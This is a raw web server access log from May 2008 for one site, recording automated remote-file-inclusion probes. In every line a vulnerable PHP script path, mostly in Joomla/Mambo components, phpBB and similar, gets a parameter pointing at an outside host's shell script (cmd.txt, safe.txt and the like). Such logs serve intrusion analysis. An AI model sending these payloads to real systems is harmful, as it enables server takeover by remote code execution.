62.128.131.80 - - [24/May/2008:10:17:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.128.131.80 - - [24/May/2008:10:17:25 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:17:32 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:17:32 -0700] "GET //includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:17:32 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:17:33 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:17:34 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:17:34 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:17:44 -0700] "GET /logs/access_080220.log//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:17:44 -0700] "GET /logs//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:17:53 -0700] "GET /logs/access_080312.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:17:53 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:17:53 -0700] "GET /logs//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:17:54 -0700] "GET /logs/access_080201.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:18:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:18:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:18:17 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:18:26 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:10:18:35 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:19:00 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:19:03 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.227.251.172 - - [24/May/2008:10:19:13 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:19:22 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:19:23 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:10:19:24 -0700] "GET /logs/index.php?incl=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:10:19:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:10:19:35 -0700] "GET /index.php?incl=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:10:19:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:19:47 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:19:47 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:19:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:19:57 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:19:57 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:20:05 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.810" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:10:20:31 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:10:20:32 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:10:20:34 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:10:20:34 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:20:38 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:20:38 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:20:39 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:20:39 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:45 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:20:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:45 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:46 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:20:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:46 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:20:46 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:49 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:49 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:20:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:20:55 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:20:57 -0700] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:20:58 -0700] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.85.130.159 - - [24/May/2008:10:20:59 -0700] "GET /logs/access_080327.log/appserv/main.php?appserv_root=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [24/May/2008:10:20:59 -0700] "GET /appserv/main.php?appserv_root=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [24/May/2008:10:20:59 -0700] "GET /logs/appserv/main.php?appserv_root=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:21:25 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:21:28 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:10:21:39 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
147.91.226.2 - - [24/May/2008:10:21:41 -0700] "GET /logs/access_080113.log//login.php?dir=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:21:46 -0700] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.63.130.242 - - [24/May/2008:10:21:52 -0700] "GET //errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.63.130.242 - - [24/May/2008:10:21:52 -0700] "GET /logs//errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:21:55 -0700] "GET /logs/access_080327.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
147.91.226.2 - - [24/May/2008:10:21:56 -0700] "GET /logs/access_080126.log//login.php?dir=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:10:22:09 -0700] "GET /logs/access_080213.log/sub.php?menu=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:22:23 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
84.19.178.201 - - [24/May/2008:10:22:24 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:22:25 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:22:25 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:22:55 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:23:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:23:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:23:08 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:23:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:23:16 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:23:16 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:23:16 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:23:21 -0700] "GET /logs/access_080103.log//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:10:23:22 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:10:23:22 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:23:30 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:23:30 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:23:37 -0700] "GET /logs/access_080223.log//index.php?option=com_restaurante&task=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:23:54 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:23:55 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:23:55 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:23:55 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:03 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:03 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:03 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:03 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:04 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:24:04 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:24:06 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:24:32 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:24:33 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:24:43 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
